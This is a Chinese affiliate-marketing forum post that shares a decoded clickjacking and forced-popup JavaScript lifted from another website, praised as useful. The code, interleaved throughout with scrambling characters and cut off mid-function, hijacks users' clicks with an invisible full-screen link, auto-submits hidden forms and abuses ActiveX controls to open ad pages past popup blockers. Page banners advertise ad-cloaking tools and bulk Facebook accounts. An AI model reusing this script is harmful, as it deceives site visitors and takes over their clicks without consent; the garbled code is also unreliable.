AdvertCN - 广告中国

 找回密码
 立即注册

QQ登录

只需一步,快速开始

Binom
 谷歌+Bing+TT+MSN官方代理 
⚡️按条S5代理⚡️静态⚡️独享⚡️5G⚡️最干净<Wifi住宅+5G移动>IP代理泰国仓储,本土仓发货2-3元/单
7200W全球动态不重复住宅IP代理BINOM TRACKER 60% OFF!【广
户】⚡️我们很有钱这些广告位都是我买的
FB/Google/TK点我开户⚡️FB/TT/KW 加白开户ADPLEXITY + ADVERTCN
比Adplexity还好用的Spy工具MediaGo+Taboola+Ob开户百度国际MediaGo⚡️让产品狂奔全球百度国际,高点击转化,快速放量
百度国际MediaGo,独家原生流量虚拟信用卡+独立站收款行业首创新型指纹Cloak, 谷歌奇效!Kookeey⚡️100%独享⚡️原生住宅IP
全球虚拟卡, 支持U充值免账户投放 FB 广告(送项目)2024做什么 - Media buy 项目库免费黑五教程(持续更新、欢迎交流)
Facebook 批量上广告Bridgeway - 联盟营销网络各种主页、账单户、BM户(优势)⚡️个人户,bm户不限额,账单户
Adsterra 的CPA/CPM/CPC 网站流量EU KETO/CBD - Jumbleberry9Proxy ⚡️ $0.04/IP, 无限带宽 cloak斗篷/ss/nutra/cpa/Dating
FB号商直销-24小时自动发货Facebook个号0.01一个FB个号1块一个FB账号0.1一个
FB顶级服务商「Facebook广告账号/批量采购」IPCola原生住宅IP⚡️$2.1/条双ISPFB各类账号出售,售后24h在线
广告位出租全球低价纯净住宅/移动IP-免费试用VMLogin指纹浏览器+多账号防关联 
查看: 14129|回复: 17

[FACEBOOK] 国内也有牛人啊。很有用的。

[复制链接]

126

主题

62

广告币

394

积分

初级会员

Rank: 2

积分
394

社区QQ达人

发表于 2013-12-17 15:03:03 | 显示全部楼层 |阅读模式
adsterra
天星网ClickJacking点击劫持分析1 B1 l  f# k3 f0 g+ l3 Z& b/ y
http://www.21tx.com/ 天星网
: Q, U1 ~9 n2 `# {  B$ @我得联系联系作者
5 `! h8 R0 Q( R7 G8 I; Z刚好打开这个站,发现第一次点击会弹窗,然后就不会,清除下COOKIE,又继续了,然后查看源代码,也没什么奇葩的。
; z. w0 s5 S* w8 Ahttp://www.lxting.com/script/popup/v1_min.js
7 O* l/ j' a7 ]" V1 n4 I+ E) w8 ]8 V  R% f1 {* A5 [2 l* R
这个是锁定到底JS脚本,
4 K+ G1 B2 p6 Q7 d5 [% J" H$ Q) [/ D解密后的代码
  1. (function() {
    5 h, e4 a, X; Y' B) l# R1 [- J
  2.     var aa_url = window.ytpp_url;
    9 j; V/ L# h; O4 I0 Z
  3.     var ua = navigator.userAgent;
    8 @% H: I; x5 F2 e
  4.     var form_div = document.createElement('div'); 4 n* ~3 ]6 g+ J: e
  5.     var form_pd = 0;
    ( {% @- ?( i8 Q5 O) U. _
  6.     var browser = { ( z$ b8 {6 h2 M& ?. U
  7.         ie: /msie/i.test(ua), ! a$ Y; ~. r1 p3 ]+ i" B, l
  8.         ie6: /msie 6/i.test(ua), , T. O( M8 c9 S$ y
  9.         ie7: /msie 7/i.test(ua), $ D7 M, l3 ?1 F4 g9 k- t% u+ t, k
  10.         ie8: /msie 8/i.test(ua),
    * h5 T0 t/ Z" {8 I
  11.         ie9: /msie 9/i.test(ua),
    6 Q2 n, _! C/ L3 j5 O; m
  12.         360 : /360se/i.test(ua), 8 H7 {% T! Q- ^! L
  13.         sogou: /;?se.+?MetaSr/i.test(ua),
    7 S- V3 j  O; n9 T6 y
  14.         maxthon: /Maxthon/i.test(ua), " Y/ k' u8 `9 ~5 A% S7 d: F5 c
  15.         tt: /TencentTraveler/i.test(ua), 3 o7 p& [% ]6 a) F0 X3 Y
  16.         ff: /firefox/i.test(ua), $ g9 l' Q- w# @% y, f* Z
  17.         webkit: /AppleWebKit/i.test(ua),
    + V3 I# V& I& S, g/ b
  18.         opera: /Opera/i.test(ua),
    8 e' ^& L: f( C
  19.         qqbrowser: /QQBrowser/i.test(ua),
    1 |3 g7 L7 s. F( ?5 j. T4 @. e  E: F
  20.         cr: /chrome/i.test(ua),
    * Y% ^. z/ ^8 I
  21.         gg: window.chrome, 6 w+ I+ B, ^2 D& K
  22.         theworld: /Theworld/i.test(ua)
    ; N0 x9 p* v2 r3 S% ]7 N7 h0 T
  23.     };
    + e" Q, ]) j) O! |
  24.     var _setting = "";
    " Y1 @4 [+ N0 }- b0 H
  25.     var _ct = 0;
    6 j! k  |$ q6 d* g  f9 w
  26.     var _le = 0; 0 W% Z3 D8 a" ]  h
  27.     var _pd = 1;
    2 S5 a$ G9 I4 `/ i' f$ j% n- p' c
  28.     var _pd2 = 0; . p/ k: ?  X) z  J1 w6 Y2 \: @
  29.     var _pc = 1;
    . y. j1 V: M& ~7 t2 i
  30.     var _pc2 = 1;
    0 ~6 P" E7 g# M! o
  31.     var _pco = 0; 3 J- f  a6 K. B5 J
  32.     var _pta = 0;
    / C2 `3 B  D& |! W+ Y' A
  33.     var _ptb = 0; $ ^6 L; t) X1 D
  34.     var _pt2a = 0; , P4 b8 q9 ?* }# l
  35.     var _pt2b = 0;
    8 ?/ t3 g3 I. Q0 I" F) e7 V
  36.     var _pt3a = 0; 2 k- O' m# x- j) j, _
  37.     var _pt3b = 0; 6 ?/ k: g1 Z  k  q7 J- V
  38.     var _pt4a = 0;
    ' \1 a  E) R# j( Y! d
  39.     var _pt4b = 0;
    ! v, N6 O6 G: ?7 N7 G/ j
  40.     var _pt5a = 0; 0 {7 ]( b! o: K" s  O
  41.     var _pt5b = 0; 5 E. \# G3 j# |
  42.     var _pt6a = 0; , ^3 r3 Q& t7 y1 ~+ t, d
  43.     var _pt6b = 0;
    7 u7 {* @* `, {. L
  44.     var _pt7a = 0;
    3 [1 ?9 Y) `! p7 W" _. _
  45.     var _pt7b = 0;
    : v9 f! K4 P3 G
  46.     var _pt8a = 0; 4 O+ ~$ V9 I4 v! C* }4 q
  47.     var _pt8b = 0; ; P# i8 L& {  D+ |) P$ L
  48.     var _pt9a = 0; * I& G' J8 L& s$ P( P! D, g  W( V
  49.     var _pt9b = 0; 6 M" N) U' ^7 q$ {# L
  50.     var _pt10a = 0;
    % o/ t/ r; S2 i: r) q( L$ ^" t
  51.     var _pt10b = 0;   I$ I. i# E) e5 f6 A  B+ K: ~
  52.     var _po = 0; . p0 n9 `# k9 C  i' N0 |9 j
  53.     var _poo = 0;
    ( b; C) p7 r' I2 U. f  w7 E$ g
  54.     var ckn, ckt; 2 |& e2 ?6 o/ T/ L: V! l: L; M
  55.     var ads = 0; * D3 U5 i: J. U
  56.     function b(w) { ) X1 z/ x. U+ r7 D  ~- J  w
  57.         var s = w + "="; 8 c) ?8 n( n$ I! _. {
  58.         var r = "";
    : q& V) Y. M4 w/ M4 t) w; |
  59.         var o = 0;
    0 N& L  L4 X4 _3 ?. t6 L. C
  60.         var d = 0; 3 q; v: ~3 }: o4 R  t0 r
  61.         var p = document.cookie; 4 C4 [- N, x1 O- s' U+ x$ Z4 s
  62.         if (document.cookie.length > 0) { 2 F0 D$ R3 c# e$ g; n/ K
  63.             o = document.cookie.indexOf(s);
    * Q. _* s: P2 z9 G+ I* g" J: u
  64.             if (o != -1) {
    3 y( \; y1 R) s6 K
  65.                 o += s.length;
    5 M7 i$ }- J6 P4 S, E. l
  66.                 d = document.cookie.indexOf(";", o); 5 U( s" S7 j- L' q+ y3 b/ e
  67.                 if (d == -1) d = document.cookie.length;
    4 H+ {- i, `+ g) `& @% ~0 V" `
  68.                 r = unescape(document.cookie.substring(o, d)) 4 m" {" u" v+ q
  69.             } 5 e  ^8 F& ]/ |' O1 [
  70.         } 0 P+ N# b# M1 [  t' R! ]* ]1 |
  71.         return r
    # p$ A& h, x  s  i: {
  72.     };
    + s3 {  E: C5 E* o2 e( U: T" {
  73.     function p(w, p, v) {
    % C; f: k8 |. \- A4 g) J
  74.         var t = 30; 7 |* K; F9 G% g
  75.         try {
    ; T  `0 Q8 |5 M# }
  76.             t = parseFloat(p) * 1 5 z. M' L  t4 w, k+ y
  77.         } catch(e) {
    $ [# p/ @4 ?' ^2 K& l* @
  78.             t = 30 " f+ G# v! q' ~7 K
  79.         }
    ( t" @" [0 B) T* I7 O/ h
  80.         if (isNaN(t)) t = 30;
    9 s6 m3 N$ w. A$ F& ^3 a
  81.         var then = new Date();
    ) q  a/ y5 v" G# Q/ x
  82.         then.setTime(then.getTime() + t * 60 * 1000);
    9 ~" M; I* X9 g( \# P: ~8 e' i
  83.         document.cookie = w + '=' + v + ';expires=' + then.toGMTString() + ';path=/;'
    4 L7 D( S. @  M; c3 g4 C" ^% K
  84.     }; 1 ^4 E' j6 y" P7 Z9 x; G5 t5 ]9 j
  85.     function init() {
    * C2 _# z4 `1 v" ]8 g# R
  86.         _setting = ytpp_sti;
    6 i% W- p$ K- k8 o
  87.         if (getp(_setting, "CT")) {
    ; o+ m( d2 [0 H9 [
  88.             _ct = getp(_setting, "CT")
    & U3 r! U2 c: L; Y
  89.         }
    - k. I) w' w) M' }& y2 J% O2 K
  90.         if (getp(_setting, "LE")) {
    8 X  ^9 L* u1 b; `! W; c5 I
  91.             _le = getp(_setting, "LE")
    6 y$ i' A% H% N
  92.         }
    . _$ E2 t9 p$ k' t3 g' d
  93.         if (getp(_setting, "PD2")) {
    $ I: G4 ]5 P" {/ L0 f! T
  94.             _pd2 = getp(_setting, "PD2")
    ) r9 P, D# ]6 B- z$ e5 `! `" @
  95.         } 3 I$ j$ B+ T9 I! q+ j4 ]
  96.         if (getp(_setting, "PC2")) { ( `% H5 C7 j3 Z
  97.             _pc2 = getp(_setting, "PC2")
    & P0 P9 }: A3 E3 g
  98.         } ' P( f  r4 o% P( H; E9 j! k5 c- m
  99.         if (getp(_setting, "PCO")) {
    * Y3 w6 n' ~- n4 x$ ~& W
  100.             _pco = getp(_setting, "PCO")
    / Q5 h( i& e, N" e& Z
  101.         }
    ( X7 u- I5 b5 Y& m' t
  102.         for (var i = 1; i <= 10; i++) {
    $ F3 S9 Q" m' Y6 E5 Z  F
  103.             var n = i == 1 ? "": i; - A+ l7 s- ^- \  M8 n( B' Q$ N, ^
  104.             if (getp(_setting, "PT" + n)) {
    3 y' e% z( i* R8 p5 O
  105.                 eval("var _pt" + n + " = getp(_setting, 'PT" + n + "').split(',');"); ( y8 ]; z( Z4 o* C: [1 x$ d" C
  106.                 eval("_pt" + n + "a = _pt" + n + "[0];"); , k" g; C$ y6 \9 r- u3 ?
  107.                 eval("_pt" + n + "b = _pt" + n + "[1];")
    & \5 n- M1 o# p
  108.             } / n8 A$ o/ f. j: i: g0 h
  109.         } ( _) y8 N9 F& `' O; j0 \( P" _
  110.         if (getp(_setting, "PO")) { ; L  j. m- e; V4 x, w
  111.             _po = getp(_setting, "PO") % N/ _+ G' X1 h8 d# t  W( P
  112.         }
    8 ~7 ?# G' z: k
  113.         if (getp(_setting, "POO")) {
    - V0 N: o6 O8 E6 T
  114.             _poo = getp(_setting, "POO") + m% u0 }5 [# ~' Z
  115.         } 6 v: p3 o0 ]' B7 s2 Z! G
  116.         if (_pco == 1 || _poo == 1) { / g$ |  N. z8 U$ o8 p2 B
  117.             if (_poo == 1) { " I1 \/ m  c0 }0 B% [0 K) \- [
  118.                 _pco = 0 % ~/ K/ N1 _& C# {- P* d; X7 c
  119.             } else { # ]# V9 g' t' S- W: ?" v
  120.                 _poo = 0 $ ]# S; S# ~5 D" T9 K- B
  121.             } # D: ?$ a- c( D
  122.             _pd = _pd2 = _pc = _pc2 = _po = _pta = _ptb = 0; + S  X* X% ]0 X8 a5 P( `8 w
  123.             for (var i = 2; i <= 10; i++) {
    1 T7 w  w' U2 K) h
  124.                 eval("_pt" + i + "a = _pt" + i + "b = 0;") 8 B" {. G8 M% O% G1 ^
  125.             }   K9 S* X2 X! k5 M0 z
  126.         } 5 L% i* A$ g" L: h+ `
  127.     }; $ O$ D3 l* q/ G0 ?
  128.     function getp(s, p) { . \. n& f6 I7 s; r% `% E& [, Y( v
  129.         var i = s.indexOf(p + ":");
    5 g) {! W, T3 o- [. n0 l% z" d7 I
  130.         if (i >= 0) { % d+ q0 g8 j+ _. z7 n  O
  131.             return s.substr(i + p.length + 1, s.substr(i).indexOf(";") - p.length - 1) ( ?9 X# p6 ~- \4 t* o1 q: o1 l; t
  132.         } & M( j2 R1 Q% ^% P$ u4 O) M  |
  133.     };
    # N* P2 a4 v; I- W7 `
  134.     function event(e, event, func, act) { 3 I, o. }( g! k( r& ?" \! G& F
  135.         if (browser.ie) e[act === undefined ? 'attachEvent': 'detachEvent']('on' + event, func); 3 Y& r8 m/ l, y7 A
  136.         else e[act === undefined ? 'addEventListener': 'removeEventListener'](event, func, false) 7 P( P$ C$ I4 B' Y. F
  137.     }
    ( U% z& z/ \* P0 Y& E
  138.     function pop(url, param) {   t3 s' p5 E& o7 l! j, f9 n3 @; Q+ g
  139.         if (!document.body) { 1 G0 @/ e4 H& e) B
  140.             return setTimeout(function() { / l2 `9 B7 w$ k$ J
  141.                 pop(url, param) ; c- ^! a: y% z$ \. h: Y
  142.             }, # _! \! U5 g5 r1 C
  143.             13) 1 H1 d! U) w: h) v/ u, G. l  M
  144.         } # j# W5 F3 Q. l* u0 ^7 [+ y1 ]) N5 v. |
  145.         try {
    4 Z: H  }, {6 S5 R6 P
  146.             if (browser['cr'] && browser['gg']) {
    0 Y$ J+ X1 ]! }+ @- K- C
  147.                 try { 2 L" {. `" M: q9 T& g# E) w% r
  148.                     hrefopen(url)
    5 a5 t$ Q. D' w; k
  149.                 } catch(e) { ( c! ?! s8 g- h/ f, `% c/ i( U+ G- C
  150.                     a_pop(url)
    " M5 d: N2 L" P- c7 c0 R5 Z
  151.                 }
    ; S, G& r1 C* E3 r
  152.             } else if (browser['webkit'] && browser['maxthon']) {
    3 k0 q- H" g! r
  153.                 if (!func(url)) { / y0 o5 b# p& u
  154.                     try {
    , Q. G* Z4 X( D) u
  155.                         form_pop(url);
    4 T9 f, z0 P/ p7 u' t" N
  156.                         a_pop(url) 5 W. J* ?* e0 e8 l9 ~# C
  157.                     } catch(e) {}   L# Y7 `: ^& G/ v$ N; F/ d/ |5 q2 Q, {) ?
  158.                 }
    + ~9 e/ O+ [1 L7 w
  159.             } else if (browser['tt']) {
    ' A7 b, B* C, M8 ~
  160.                 try {
    , N: o8 Z% a( k1 W! X$ u- \$ E/ Y
  161.                     object_pop(url)
    ( M- o' H0 h" s5 y; ~0 d$ z  O2 a4 d
  162.                 } catch(e) { 3 \" z% \0 x- f. z
  163.                     a_pop(url)
    & |* ?; {$ j$ e# Z6 p+ i: ]5 L
  164.                 } " D; B$ J' l1 i8 f* z
  165.             } else if (browser['sogou']) { # d* i0 E/ S. S, H  J
  166.                 if (!func(url)) {
    - S8 y1 ~( Q8 O
  167.                     try {
    3 ^% a' G& T/ _( b8 t  `  U
  168.                         a_pop(url)
    5 K( ?, g4 {' F
  169.                     } catch(e) {}
    9 y* V. ^2 b# r: j: K/ J8 w- G
  170.                 } / Z( [  [$ w1 k2 D0 g6 n
  171.             } else if (browser['webkit'] && browser['qqbrowser']) {
    1 H! Q; c  b* R, V  k4 b6 C) k0 v  j
  172.                 if (!func(url)) {
    ; X7 j0 }7 K( t7 N3 e9 F+ u
  173.                     try {
    ; t! i/ R( f! s! A2 h/ s
  174.                         form_pop(url)
    " T7 h% B) ]( o1 i
  175.                     } catch(e) {
    5 m- R; \/ p/ @
  176.                         click_pop(url) : q' W! Z# G* E# e0 G6 o
  177.                     } / }8 Y/ J: A' r/ V8 ]8 D
  178.                 } % i5 n- ~4 q6 P+ H- K" l
  179.             } else if (browser['webkit'] || browser['opera']) { ) F7 y( G: x; S! D
  180.                 try {
    - d3 ?- Z( S8 Y: C0 U( W
  181.                     form_pop(url);
    3 P* `( v9 j/ L0 W
  182.                     a_pop(url) 0 }9 q: N- C4 x% V
  183.                 } catch(e) {} 6 l# [. C/ G* A1 v, j5 a
  184.             } else if (browser['theworld'] && browser.ie6) { " C& a" d* u+ S. J: V! M
  185.                 if (!object_pop2(url)) { 5 J" p8 d+ r3 L5 _8 T
  186.                     a_pop(url)
    : d5 d0 j" Z5 ?4 s% {" k- o2 }
  187.                 }
    / F& H  F* {! Q
  188.             } else if (browser['theworld'] && browser.ie8) { + s! j6 {% {! X  o# i0 ~9 E9 S
  189.                 if (!func(url)) {
    3 ^1 F* |/ L  `& T! Q8 `" {
  190.                     try { ; E1 {. H9 @5 y3 b" B
  191.                         object_pop(url)   M4 ^0 C9 i! x$ ]# p
  192.                     } catch(e) {
    7 h6 I: a3 X$ S- t) w1 G
  193.                         click_pop(url)
    " A) {, Z1 |& H) q( a# v3 |
  194.                     } & ]6 B! p1 L8 n. U, S1 p& X
  195.                 } $ ]4 X% `" Y4 b/ i  r6 p, ]
  196.             } else if (browser.ie6) {
    , \1 e! M5 a! P3 o1 h& y
  197.                 if (!func(url)) {
    ; J/ p1 R5 v2 D- b0 ^
  198.                     object_pop2(url) + c3 |* z5 {1 d' h4 X
  199.                 } 0 y+ A( o1 q. y8 C* G* h
  200.             } else if (browser.ie8) {
    9 I. Q: F9 t# t: [" _
  201.                 if (!func(url)) {
    " m7 p3 [0 R- t; V
  202.                     try { ! C  E: B0 x% h. l
  203.                         object_pop(url)
    7 f, W+ g, X1 @7 y0 |0 x, T6 K
  204.                     } catch(e) {
    " _7 u! b7 R( o* @. ]
  205.                         document.onclick = function() {
    - n9 Z1 X% i) r& ^6 \' `
  206.                             func(url); ( Z: s* Y. x. l! D# B% u3 z
  207.                             document.onclick = null
    ( B# N6 D) k/ t, R
  208.                         }
    * {, ^+ A$ q: O& K6 E
  209.                     }
    2 L# D2 B" f% k; l9 M' m& C. e% _
  210.                 }
    4 N; ?" \& E8 c2 e
  211.             } else if (browser['ie']) { ! Q& P  `8 z3 z% @+ w% X6 w
  212.                 try { ) k0 n  ?7 ?( h- D- ?3 d1 v
  213.                     object_pop(url)
    5 n% U! m& {% o6 ~  N( _4 \6 d# G
  214.                 } catch(e) {
    ) |. l- u+ {. \/ d7 I' I
  215.                     click_pop(url)
    0 J) t; t( _& n2 B
  216.                 }
    3 U" L1 s$ I) L' }( d8 G" p2 j+ k2 `
  217.             } else if (browser['ff']) { . l6 p1 P/ D& a' `7 b* ]4 t- o0 i% C) v
  218.                 if (!func(url)) {
    % s2 |) U. O3 r- v7 V
  219.                     click_pop(url)
    ) N! x; w  \6 r8 q5 C! K2 P
  220.                 }
    ' U- ^" L1 F# O9 X0 }' z' F1 ?- v
  221.             } else { - A; a1 e7 P6 y- c( `4 \5 e+ c) k
  222.                 if (!func(url)) { 2 V+ p/ q/ s. e: K" D
  223.                     click_pop(url)
    , G4 r* @6 [1 l1 a9 M
  224.                 } ( m0 X  [3 i( E9 Z2 e5 Z$ [, w
  225.             }
      q1 d. W. {! `: q# |% b1 I
  226.         } catch(e) { 1 i' f) k: R! ?# f
  227.             if (browser.ie7 || browser.ie8 || browser.ie9 || browser['qqbrowser']) { - w" h2 y. q0 k
  228.                 click_pop(url) ) Z0 @, c3 l, Q0 y, l' C1 ~" A$ b
  229.             } else { 3 m# l( j$ n2 y8 O+ C5 v2 O$ n
  230.                 a_pop(url) * ~: A1 \5 w9 c5 z
  231.             } " m" e$ M/ R/ {( N% q! i" V2 e( `
  232.         }
    0 Q3 F  w+ ]$ T% |1 Z" N5 u  Y
  233.     }
    2 e+ h/ G+ v! ]7 B  B' n
  234.     function object_pop(url, param) {
    2 g$ H4 y0 S% \2 q
  235.         var object = document.createElement('object');
    * O7 b0 t8 G3 a3 d) q& A9 i$ ^+ K
  236.         object.setAttribute('classid', 'CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'); 1 u) e. `2 u: H
  237.         object.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; " d, v/ f1 ^3 T7 r: w8 I
  238.         append(object);
      A1 C- W$ Z" j
  239.         object.launchURL(url);
    7 a' A8 ~1 w6 Q! ~# ~! B
  240.         ads++; 1 S4 e5 h% T6 c) ^
  241.         p(ckn, ckt, ads)
    . ?* Z! R0 G& L
  242.     }   i) l# t# T8 Y' G( ]
  243.     function object_pop2(url, param) { , j, G0 G7 `0 Q* o
  244.         var object2 = document.createElement('object'); . P  V$ C. t# J
  245.         object2.setAttribute('classid', 'clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A');
    9 A2 w  X. z) J; V" W, r( W* o  d
  246.         object2.style.cssText = 'position:absolute;left:1px;top:1px;width:1px;height:1px;'; 6 @" a" b" [; _+ o
  247.         append(object2); $ }4 H) s- W8 W" D' @; n$ f* I) y
  248.         for (var i in object2) { / U' O' f$ U; @4 D7 }- y, X
  249.             try { (function(o) {})(object2[i])
    # y  @# y& I9 z# A
  250.             } catch(e) {} * J5 i) |5 T* i9 n( {2 a
  251.         } 4 |  u! \' k2 L/ q3 u9 e! @3 a
  252.         setTimeout(function() {
    + t6 U7 A5 W, j
  253.             object2.DOM.Script.open(url, '_blank', '') ; V) p% @6 P: F
  254.         },
    3 S  H6 V1 \. P/ m6 h
  255.         500);
    5 h2 {% F  [8 D( }" i& w
  256.         ads++; 8 W7 S' n1 u, p1 O. b
  257.         p(ckn, ckt, ads)   `% @1 ?  ]4 B! ?4 P+ Y
  258.     } 4 ]8 T6 b( {) c  H) w: o  J
  259.     function append(e) { : `3 [6 R* G7 G7 v" J$ k
  260.         for (var t in {
    9 O! P$ x2 U8 P" E
  261.             body: 1
    6 `+ M3 p/ z/ V2 R
  262.         }) {
    ; H( Z0 i; g3 l) f5 p2 u3 B
  263.             var ele = document.getElementsByTagName(t);   N0 m$ U! _, `; [1 g* E4 G# ^0 A7 D/ m$ J
  264.             for (var i = 0; i < ele.length; i++) {
    ) R8 W2 ^. F1 F& C, Y& Q1 f
  265.                 ele[i].insertBefore(e, ele[i].firstChild); 5 @- V. l' C  h3 A
  266.                 return
    / Y$ @9 W) `0 Z5 ^
  267.             }
    & K5 H+ Q8 \4 S, E, a3 c
  268.         }
    3 W5 G, F+ \$ K1 c7 o6 A( y
  269.     } , E* n4 o5 }2 f# z6 h0 v
  270.     function hrefopen(url) { ! C3 v6 D4 P5 _! O9 n
  271.         try {
    7 P( q( {; Z. q) h8 {/ M
  272.             var c = document.createElement("a");
    3 r: o/ z) j1 H* o- r6 W
  273.             c.setAttribute("href", url); 6 X9 c$ }. `' e3 V' f2 a. _' x
  274.             c.setAttribute("target", "_blank"); 5 ?. a0 E: D" M$ f/ i4 \' k
  275.             c.setAttribute("style", "display:none;");
    ! |. w3 e- m/ h" @! S' A) K
  276.             var b = document.createEvent("MouseEvents"); + [; L# m6 E: a& c
  277.             b.initMouseEvent("click", false, false, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null); 2 Q# S2 ~& k: r3 m( Q
  278.             c.dispatchEvent(b); * l% |6 T3 B0 i- G
  279.             ads++; 6 f/ P6 M) C$ J) I, {
  280.             p(ckn, ckt, ads);
      J& D7 E. D! r7 K- U. w% C) N- g
  281.             return true
    - f8 z. O# f& ?6 t( G1 [
  282.         } catch(q) { + X2 j  ?( z" r+ C9 j" [
  283.             return false
    / z- ]. l1 J! [* g/ ~4 R. ]& T4 M
  284.         } 8 H) G0 J4 k1 N: c
  285.     } 5 e, o' B5 S# ~
  286.     function form_pop(url) {
    ! k) F! C. f' Q  w' h( [# E
  287.         form_div.setAttribute('id', '__unionsky_push_d_object_box__'); 5 C, J4 m. b* p% @, _
  288.         form_div.setAttribute('style', 'display:none');
    / C% m5 h- X* @- [3 I0 T+ W
  289.         var form = document.createElement('form'); ) K- L4 z) ?' S
  290.         form.setAttribute('action', aa_url); + V1 q" Z. S" @0 b: x1 A: j$ d. E7 z
  291.         form.setAttribute('method', 'post'); ! [. C% t" B2 ?7 }1 U! V
  292.         form.setAttribute('name', '__unionsky_push_d_form_box__');
    2 E& h$ Z. E8 r/ e& q
  293.         form.setAttribute('target', '_blank');
    6 i. U7 M4 z& U: p
  294.         form.setAttribute('style', 'display:none'); ) h+ t" S1 G& Z' y
  295.         var sinput = document.createElement('input'); ( F( P5 N; ~/ q0 \' `9 i
  296.         sinput.setAttribute('style', 'display:none');
    5 S5 o7 |* [) {3 h! D. O) B2 E
  297.         sinput.setAttribute('type', 'submit');
    1 y/ ?+ ?. Z/ V* U4 T+ X
  298.         sinput.setAttribute('id', '_sumit_2app');
    2 A/ E) E/ G- V' ?! D
  299.         form.appendChild(sinput); 1 I# o+ x8 @% D; T! I3 B! {7 I
  300.         form_div.appendChild(form);
    5 e1 S2 M, l! t/ P2 ~
  301.         append(form_div);
    7 ]$ T4 W; b! U5 W' W- x
  302.         var unionsky_from = document.forms["__unionsky_push_d_form_box__"]; : X$ n$ `1 z( m& t* d/ [; {8 w6 R
  303.         try {
    - ^, h% q( m' s& V
  304.             document.getElementById("_sumit_2app").click()
    ; E" t2 i$ b2 P. r( j! @$ Q
  305.         } catch(e) { * B" D+ F7 r2 ^; m! _
  306.             event(document, 'keyup',
    ; h0 c( r) ^  }" j5 x. B4 ^8 r
  307.             function(e) { $ L* o6 N! v. v7 ]5 _7 I  j
  308.                 if (document.getElementById('__unionsky_push_d_object_box__') == null) {   g4 e3 R& a  _. W7 m* C* P! `. ?
  309.                     return) [3 v! ~3 b4 b" d
  310.                 };
    $ x( z2 I. R# l: i
  311.                 e = e || window.event; + B1 I3 A+ i# \0 u. P
  312.                 e.canceBubble = true;
    , w- q! |$ P+ p2 N+ ]" m  _
  313.                 event(document, 'keyup', arguments.callee, true); + Z% j/ c: N9 b& ~9 T. @9 W
  314.                 form_pd = 1;
    0 V6 k& s- R7 _
  315.                 unionsky_from.submit()
    # h: G- x3 u! M+ c4 i- r  f% Z
  316.             }) , P" u+ P# e& V; ]# b
  317.         }
    - R1 Z$ Y9 {. W/ h
  318.     };
    - |# C9 E$ {* r; j1 o
  319.     function click_pop(url, param) { 4 V1 R9 _' c, s; E! u4 P- W+ I1 _
  320.         event(document, 'mouseup', 6 ~9 F) C3 Z; I- |
  321.         function(e) { 6 Q& t( c. Y8 I* y
  322.             e = e || window.event;
    5 l2 o# c: |& g# W2 p( {. C
  323.             e.canceBubble = true;
    & ~$ s& ~! l8 O" j9 Y
  324.             event(document, 'mouseup', arguments.callee, true);
    : t# a  m4 u2 t3 |% T. Y
  325.             func(url, param);
    3 z3 s; B8 R- n2 |! z3 J
  326.             ads++;
    ( I' G/ g7 z7 u, _
  327.             p(ckn, ckt, ads)
    1 ~& A9 r7 Z. a% P1 Q
  328.         })
    : |; N0 c; i6 R' ^  a
  329.     }; 9 S: T5 L$ a( c2 t# s
  330.     function a_pop(url) {
    3 V/ D2 l1 q4 @( F
  331.         if (ytpp_plid == 166028) {
    5 v' e2 V2 u0 {
  332.             return0 a& U4 b- z# G3 d5 \
  333.         } " `+ E1 U3 L( i: F+ J' n9 |
  334.         if (!document.body) {
    . d) |. J* B9 f8 G/ E
  335.             return setTimeout(function() {
    ; _* D# }; z( }: P, ~) Q
  336.                 a_pop(url)
    ! m( T% W) t2 {7 h; j
  337.             },
    2 H5 q7 X3 `2 O; ?; P5 W) a
  338.             13)
    ! t8 g& }3 s, F# r, ~
  339.         }
    6 G! V. q, N0 Y/ `( W2 S4 U8 X3 S
  340.         var a = document.createElement("a"); - V! k. Y" A4 U9 p% R$ w
  341.         a.href = url; " q; j# |2 n9 E" O+ D' A  z
  342.         a.target = "_blank";
    1 q% ^9 u' v( {: ^* D, ?
  343.         var div = document.createElement('div');
      z" \6 {! Z% C2 N" q  h
  344.         div.style.backgroundColor = '#fff';
    8 b  P- L4 c& c1 T* V2 V7 l% _; i
  345.         a.appendChild(div); 1 {( L* V/ b* R: v# M, `7 S8 ?( S
  346.         append(a); - C4 H7 }0 Q4 I& Z+ y
  347.         var as = a.style;
    , V7 k' f. V/ q
  348.         as.position = "absolute"; " R7 }& {# Z) `' \
  349.         as.zIndex = '2147483647'; 2 p$ u, s9 H( y
  350.         as.display = "block";
    3 M5 H3 [& t1 N# x
  351.         as.top = "0px"; 8 N% h& g. ]! t5 K# K- n
  352.         as.left = "0px";   {% A8 I5 W1 r1 Y4 Z. P
  353.         as.cursor = 'default';
    2 w2 y3 F, @; r
  354.         as.opacity = "0";
    3 x! }$ K9 i; w8 {* H$ [$ V  F
  355.         as.filter = "alpha(opacity:0)";
    2 a. q* ]2 h0 a: T% \0 z
  356.         var m = setInterval(function() {
    9 y8 S+ Y$ Y0 v( j
  357.             if (form_pd == 1) {
    " k5 C8 |7 l0 B1 W/ ~: Y' R
  358.                 a.parentNode.removeChild(a); ' V+ Q0 V6 z6 T( o9 z$ I6 A. S, N
  359.                 clearInterval(m); 0 \/ w! N' q! I7 v8 f5 Q) D+ A
  360.                 return
    9 o5 F7 k' d9 l! B) ^
  361.             }
    - S, V3 {1 F7 b8 t
  362.             a.style.zIndex = '2147483647';
    3 z7 M7 N& W8 I7 {, v2 V6 i+ V
  363.             var d = (document.compatMode.toLowerCase() == 'css1compat') ? document.documentElement: document.body;
    / v' q, B# b' @! c$ r8 S/ H- g9 B* w
  364.             a.style.top = Math.max(document.documentElement.scrollTop, document.body.scrollTop) + 'px'; 2 A  X. R: u6 U' x
  365.             div.style.width = Math.min(d.clientWidth, d.scrollWidth) + 'px'; 1 Y3 D. ^* V3 G, h! I; ?
  366.             div.style.height = d.clientHeight + 'px'; " u' `! ]& V' _# m& {8 |" u- ~
  367.             if (browser['ie']) { # B$ F/ j+ ~  A2 R5 b: l4 y
  368.                 try {   D# g* _: r1 Q
  369.                     var divs = document.body.childNodes;
    * F  e& ^4 {6 v! h8 M0 Y
  370.                     for (var i = 0; i < divs.length; i++) { . ?1 l% S0 W% x
  371.                         if (!divs[i]['style']) { : Y, Q* d3 b4 U* N4 q
  372.                             continue% ^) q) b& H2 a3 Z
